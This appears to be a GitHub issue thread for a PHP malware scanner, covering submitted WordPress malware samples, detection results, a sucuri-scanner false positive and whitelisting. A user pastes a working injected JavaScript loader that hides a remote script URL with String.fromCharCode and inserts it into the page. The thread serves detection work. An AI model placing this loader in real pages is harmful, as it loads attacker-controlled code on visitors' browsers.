Closed darkworks closed 4 years ago
I'm afraid that URL check is not be possible, only code sample matches and we check only PHP in first hand.
For the sucuri-scanner please provide a release site where i can download and generate hash for whitelisting.
Let me check attached archives and soon i will update the database, thanks
Only 2 of the samples are not detected, are you using up to date version?
# ER # {/sample 2/search.php}
# ER # {/sample 2/pas.php}
# ER # {/sample 2/s_eval.php}
# ER # {/sample 2/accesson.php}
# ER # {/sample 2/s_noeval.php}
# ER # {/sample 1/wp-mailing.php}
# ER # {/sample 1/wp-vcd.php}
# OK # {/sample 1/index.php}
# ER # {/sample 1/cache-ssxelgwcnhoxnfoc.php}
# ER # {/sample 1/cache-ztopvwnwtfqnsefb.php}
# ER # {/sample 1/wp-craft-report.php}
# OK # {/sample 1/wp-tmp.php}
I see the SCRIPT tags, but these domains frequently changes and currently i didn't know any database to checks against, because with a new flag we may can send to check.
Found this https://hybrid-analysis.com/sample/8afc3ad8b29ed3695dc0f0ddecfb592560d22f95cdeb95fc5293633c63b43261?environmentId=100 for pushosubk.com/ntfc.php?p=2857367
and they have a public API, so we can implement a query for them with provided API key https://hybrid-analysis.com/docs/api/v2
Not listed:
So this only works when users reporting URL-s
sucuri-scanner
ok here is download link of sucuri scanner : https://wordpress.org/plugins/sucuri-scanner/
Only 2 of the samples are not detected, are you using up to date version?
# ER # {/sample 2/search.php} # ER # {/sample 2/pas.php} # ER # {/sample 2/s_eval.php} # ER # {/sample 2/accesson.php} # ER # {/sample 2/s_noeval.php} # ER # {/sample 1/wp-mailing.php} # ER # {/sample 1/wp-vcd.php} # OK # {/sample 1/index.php} # ER # {/sample 1/cache-ssxelgwcnhoxnfoc.php} # ER # {/sample 1/cache-ztopvwnwtfqnsefb.php} # ER # {/sample 1/wp-craft-report.php} # OK # {/sample 1/wp-tmp.php}
ya i just came across it and clone it from github today.
one Question , can we write output to file , i think their is no flag for file output , as where there are a lot of matches the output is hidden by ssh clients like putty , they shrink output on terminal . so will be good to have write to file flag
You can use "--output-format " to change the format so no special characters will do any harm, and also only piping the output, currently no option for file logging.
ok great
Whitelist updated with recent version of sucuri-scanner
Hi here are some samples of malicious code i found during cleaning up few wordpress sites , i think it will be good to add it to the tool
var gfjfgjk = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true; var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,110,105,112,112,101,116,46,97,100,115,102,111,114,109,97,114,107,101,116,46,99,111,109,47,115,97,109,101,46,106,115,63,118,61,51); s.src=pl; if (document.currentScript) { document.currentScript.parentNode.insertBefore(s, document.currentScript); } else { d.getElementsByTagName('head')[0].appendChild(s); }
also i noticed the tool trigger on wordpress top plugin : sucuri-scanner
sample 1.zip sample 2.zip